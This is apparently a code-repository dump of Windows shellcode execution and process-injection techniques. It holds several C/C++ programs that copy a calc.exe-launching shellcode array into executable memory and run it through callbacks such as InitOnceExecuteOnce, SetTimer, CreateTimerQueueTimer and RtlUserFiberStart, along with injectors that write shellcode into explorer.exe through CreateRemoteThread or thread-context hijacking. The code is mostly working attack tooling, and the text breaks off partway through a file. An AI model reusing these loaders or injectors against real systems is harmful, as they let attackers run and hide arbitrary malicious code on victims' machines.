shellcode 5 | unsigned char op[] = 6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 7 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 8 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 9 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 10 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 11 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 12 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 13 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 14 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 15 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 16 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 17 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 18 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 19 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 20 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 21 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 22 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 23 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 24 | "\x63\x2e\x65\x78\x65\x00"; 25 | 26 | int main() { 27 | 28 | HANDLE hProcess = ::GetCurrentProcess(); 29 | 30 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 31 | memcpy(address, &op[0], sizeof(op)); 32 | 33 | PVOID lpContext; 34 | BOOL bStatus; 35 | 36 | INIT_ONCE g_InitOnce = INIT_ONCE_STATIC_INIT; 37 | 38 | ::InitOnceExecuteOnce(&g_InitOnce, (PINIT_ONCE_FN)address, NULL, &lpContext); 39 | 40 | 41 | } -------------------------------------------------------------------------------- /Shellcode Execution/InitOnceExecuteOnce/InitOnceExecuteOnce.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/Injection Techniques/Process_Injection.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | unsigned char buf[] = ""; 5 | 6 | int main(int argc, char *argv[]) 7 | { 8 | int pid = 11096; 9 | HANDLE h_process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); 10 | if (h_process == NULL) 11 | { 12 | printf("[X] Could not obtain handle\n"); 13 | return 1; 14 | } 15 | PVOID va = VirtualAllocEx(h_process, NULL, sizeof buf, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); 16 | WriteProcessMemory(h_process, va, buf, sizeof buf, NULL); 17 | HANDLE h_thread = CreateRemoteThread(h_process, NULL, 0, (LPTHREAD_START_ROUTINE)va, NULL, 0, NULL); 18 | return 0; 19 | } 20 | -------------------------------------------------------------------------------- /Shellcode Execution/Injection Techniques/Thread_Injection.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | DWORD getProcessId(const char *processName) { 8 | HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 9 | if (hSnapshot) { 10 | PROCESSENTRY32 entry; 11 | entry.dwSize = sizeof(PROCESSENTRY32); 12 | if (Process32First(hSnapshot, &entry)) { 13 | do { 14 | if (!strcmp(entry.szExeFile, processName)) { 15 | return entry.th32ProcessID; 16 | } 17 | } while (Process32Next(hSnapshot, &entry)); 18 | } 19 | } 20 | else { 21 | return 0; 22 | } 23 | } 24 | 25 | unsigned char shellcode[] = ""; 26 | 27 | int main(int argc, char *argv[]) { 28 | 29 | LPCSTR processName = ""; 30 | if (argc == 2) { 31 | if(strcmp(argv[1],"-h") == 0){ 32 | printf("\nUsage:\n"); 33 | printf("thread-injector.exe \n"); 34 | printf("\nIf no process provided, it will attempt to inject into explorer.exe\n\n"); 35 | exit(0); 36 | } 37 | } 38 | 39 | if (argc != 2) { 40 | printf("No process provided, injecting into explorer.exe\n"); 41 | processName = "explorer.exe"; 42 | 43 | } 44 | else{ 45 | printf("Attempting to inject into %s", processName); 46 | processName = argv[1]; 47 | } 48 | 49 | int processId = getProcessId(processName); 50 | if(processId != 0) 51 | { 52 | printf("\n[+] PID:%d",processId); 53 | } 54 | else{ 55 | printf("\n[-] Cound not obtain PID, aborting"); 56 | } 57 | HANDLE h_thread; 58 | THREADENTRY32 threadEntry; 59 | CONTEXT context; 60 | context.ContextFlags = CONTEXT_FULL; 61 | threadEntry.dwSize = sizeof(THREADENTRY32); 62 | 63 | HANDLE h_process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, processId); 64 | PVOID b_shellcode = VirtualAllocEx(h_process, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); 65 | WriteProcessMemory(h_process, b_shellcode, shellcode, sizeof shellcode, NULL); 66 | 67 | HANDLE h_snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); 68 | Thread32First(h_snapshot, &threadEntry); 69 | 70 | while (Thread32Next(h_snapshot, &threadEntry)) 71 | { 72 | if (threadEntry.th32OwnerProcessID == processId) 73 | { 74 | h_thread = OpenThread(THREAD_ALL_ACCESS, FALSE, threadEntry.th32ThreadID); 75 | break; 76 | } 77 | } 78 | 79 | SuspendThread(h_thread); 80 | 81 | GetThreadContext(h_thread, &context); 82 | context.Rip = (DWORD_PTR)b_shellcode; 83 | SetThreadContext(h_thread, &context); 84 | ResumeThread(h_thread); 85 | 86 | } 87 | -------------------------------------------------------------------------------- /Shellcode Execution/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // alfarom256 calc shellcode 5 | unsigned char op[] = 6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 7 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 8 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 9 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 10 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 11 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 12 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 13 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 14 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 15 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 16 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 17 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 18 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 19 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 20 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 21 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 22 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 23 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 24 | "\x63\x2e\x65\x78\x65\x00"; 25 | 26 | // including ntdef.h was breaking the program so I just simply got the typedef from: 27 | // https://docs.microsoft.com/en-us/windows/win32/api/ntdef/ns-ntdef-_unicode_string 28 | 29 | typedef struct _UNICODE_STRING { 30 | USHORT Length; 31 | USHORT MaximumLength; 32 | PWSTR Buffer; 33 | } UNICODE_STRING, * PUNICODE_STRING; 34 | 35 | // https://doxygen.reactos.org/d1/d97/ldrtypes_8h_source.html 36 | 37 | typedef PVOID PACTIVATION_CONTEXT; 38 | 39 | typedef struct _LDR_DATA_TABLE_ENTRY 40 | { 41 | LIST_ENTRY InLoadOrderLinks; 42 | LIST_ENTRY InMemoryOrderLinks; 43 | LIST_ENTRY InInitializationOrderLinks; 44 | PVOID DllBase; 45 | PVOID EntryPoint; 46 | ULONG SizeOfImage; 47 | UNICODE_STRING FullDllName; 48 | UNICODE_STRING BaseDllName; 49 | ULONG Flags; 50 | USHORT LoadCount; 51 | USHORT TlsIndex; 52 | union 53 | { 54 | LIST_ENTRY HashLinks; 55 | struct 56 | { 57 | PVOID SectionPointer; 58 | ULONG CheckSum; 59 | }; 60 | }; 61 | union 62 | { 63 | ULONG TimeDateStamp; 64 | PVOID LoadedImports; 65 | }; 66 | PACTIVATION_CONTEXT EntryPointActivationContext; 67 | PVOID PatchInformation; 68 | } LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY; 69 | 70 | typedef VOID(NTAPI LDR_ENUM_CALLBACK)(_In_ PLDR_DATA_TABLE_ENTRY ModuleInformation, _In_ PVOID Parameter, _Out_ BOOLEAN* Stop); 71 | typedef LDR_ENUM_CALLBACK* PLDR_ENUM_CALLBACK; 72 | 73 | // https://doxygen.reactos.org/d7/d55/ldrapi_8c.html#ac623c02eff0b751a63f8573eaca95153 74 | 75 | typedef NTSTATUS(__stdcall* _LdrEnumerateLoadedModules)( 76 | BOOL ReservedFlag, 77 | LDR_ENUM_CALLBACK EnumProc, 78 | PVOID context 79 | ); 80 | 81 | 82 | int main() { 83 | 84 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 85 | memcpy(address, &op[0], sizeof(op)); 86 | 87 | HMODULE hNtdll = ::GetModuleHandleW(L"ntdll"); 88 | 89 | if (hNtdll) { 90 | 91 | _LdrEnumerateLoadedModules LdrEnumerateLoadedModules = (_LdrEnumerateLoadedModules)::GetProcAddress(hNtdll, "LdrEnumerateLoadedModules"); 92 | LdrEnumerateLoadedModules(NULL, (PLDR_ENUM_CALLBACK)address, NULL); 93 | 94 | } 95 | 96 | } -------------------------------------------------------------------------------- /Shellcode Execution/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/LdrpCallInitRoutine/LdrpCallInitRoutine.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/LdrpCallInitRoutine/Source.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // alfarom256 calc shellcode 5 | unsigned char op[] = 6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 7 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 8 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 9 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 10 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 11 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 12 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 13 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 14 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 15 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 16 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 17 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 18 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 19 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 20 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 21 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 22 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 23 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 24 | "\x63\x2e\x65\x78\x65\x00"; 25 | 26 | 27 | typedef size_t(__fastcall* lpCallInitRoutine)(size_t, size_t, size_t); 28 | typedef char(__fastcall* pLdrpCallInitRoutine)(lpCallInitRoutine, size_t, unsigned int, size_t); 29 | 30 | #define NTDLL_LDRPCALLINITRT_OFFSET 0x000199bc 31 | // ? ntdll!LdrpCallInitRoutine - ntdll 32 | 33 | int main() { 34 | HANDLE hProcess = ::GetCurrentProcess(); 35 | 36 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 37 | if (!address) { return -1; } 38 | memcpy(address, &op[0], sizeof(op)); 39 | 40 | uintptr_t hNtdll = (uintptr_t)GetModuleHandleA("ntdll"); 41 | if (!hNtdll) { return -1; } 42 | 43 | // todo: find a better way to get LdrpCallInitRoutine. I'm lazy right now. 44 | uintptr_t func = hNtdll + NTDLL_LDRPCALLINITRT_OFFSET; 45 | pLdrpCallInitRoutine LdrpCallInitRoutine = (pLdrpCallInitRoutine)func; 46 | LdrpCallInitRoutine((lpCallInitRoutine)address, 0, 0, 0); 47 | 48 | } -------------------------------------------------------------------------------- /Shellcode Execution/OpenThreadWaitChainSession/CreateTimerQueueTimer.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #define LEN 277 6 | 7 | // alfarom256 calc shellcode 8 | unsigned char op[] = 9 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 10 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 11 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 12 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 13 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 14 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 15 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 16 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 17 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 18 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 19 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 20 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 21 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 22 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 23 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 24 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 25 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 26 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 27 | "\x63\x2e\x65\x78\x65\x00"; 28 | 29 | 30 | 31 | int main(){ 32 | 33 | 34 | LPVOID addr = VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 35 | RtlMoveMemory(addr, op, sizeof(op)); 36 | 37 | 38 | 39 | HANDLE timer; 40 | HANDLE queue = ::CreateTimerQueue(); 41 | HANDLE gDoneEvent = CreateEvent(NULL, TRUE, FALSE, NULL); 42 | if (!::CreateTimerQueueTimer(&timer, queue, (WAITORTIMERCALLBACK)addr, NULL, 100, 0, 0)) { 43 | 44 | printf("Fail"); 45 | } 46 | 47 | if (WaitForSingleObject(gDoneEvent, INFINITE) != WAIT_OBJECT_0) 48 | printf("WaitForSingleObject failed (%d)\n", GetLastError()); 49 | } -------------------------------------------------------------------------------- /Shellcode Execution/OpenThreadWaitChainSession/OpenThreadWaitChainSession.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/RtlUserFiberStart/RtlUserFiberStart.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/RtlUserFiberStart/Source.cpp: -------------------------------------------------------------------------------- 1 | // alfarom256 2 | 3 | #include 4 | #include 5 | 6 | #define TEB_FIBERDATA_PTR_OFFSET 0x17ee 7 | #define LPFIBER_RIP_OFFSET 0x0a8 8 | 9 | // calc shellcode 10 | unsigned char op[] = 11 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 12 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 13 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 14 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 15 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 16 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 17 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 18 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 19 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 20 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 21 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 22 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 23 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 24 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 25 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 26 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 27 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 28 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 29 | "\x63\x2e\x65\x78\x65\x00"; 30 | 31 | typedef int(WINAPI* tRtlUserFiberStart)(); 32 | 33 | int main() { 34 | HMODULE hMod = GetModuleHandleA("ntdll"); 35 | if (!hMod) { return -1; } 36 | tRtlUserFiberStart lpRtlUserFiberStart = (tRtlUserFiberStart)GetProcAddress(hMod, "RtlUserFiberStart"); 37 | if (!lpRtlUserFiberStart) { return -1; } 38 | 39 | _TEB* teb = NtCurrentTeb(); 40 | NT_TIB* tib = (NT_TIB*)teb; 41 | void* pTebFlags = (void*)((uintptr_t)teb + TEB_FIBERDATA_PTR_OFFSET); 42 | *(char*)pTebFlags = *(char*)pTebFlags | 0b100; // set the HasFiberData bit 43 | 44 | LPVOID addr = VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 45 | if (!addr) { 46 | return GetLastError(); 47 | } 48 | RtlMoveMemory(addr, op, sizeof(op)); 49 | 50 | uintptr_t lpDummyFiberData = (uintptr_t)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x100); 51 | *(LPVOID*)(lpDummyFiberData + 0x0a8) = addr; // store the shelcode address at the offset of the FiberContext RIP in the Fiber Data 52 | //call qword ptr [ntdll!_guard_dispatch_icall_fptr (00007ffa`218b4000)] ds:00007ffa`218b4000={ntdll!guard_dispatch_icall_nop (00007ffa`217cfa80)} 53 | 54 | __writegsqword(0x20, lpDummyFiberData); // set the FiberData pointer 55 | lpRtlUserFiberStart(); 56 | } 57 | -------------------------------------------------------------------------------- /Shellcode Execution/SetTimer/SetTimer.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | // alfarom256 calc shellcode 6 | unsigned char op[] = 7 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 8 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 9 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 10 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 11 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 12 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 13 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 14 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 15 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 16 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 17 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 18 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 19 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 20 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 21 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 22 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 23 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 24 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 25 | "\x63\x2e\x65\x78\x65\x00"; 26 | 27 | 28 | 29 | 30 | int main() { 31 | 32 | 33 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 34 | memcpy(address, &op[0], sizeof(op)); 35 | 36 | UINT_PTR dummy = 0; 37 | MSG msg; 38 | 39 | ::SetTimer(NULL, dummy, NULL, (TIMERPROC)address); 40 | 41 | ::GetMessageW(&msg, NULL, 0, 0); 42 | ::DispatchMessageW(&msg); 43 | 44 | return 0; 45 | 46 | } -------------------------------------------------------------------------------- /Shellcode Execution/SetTimer/SetTimer.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/SetupCommitFileQueueW/SetupCommitFileQueueW.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #include 5 | #pragma comment(lib, "Setupapi.lib") 6 | 7 | // alfarom256 calc shellcode 8 | unsigned char op[] = 9 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 10 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 11 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 12 | 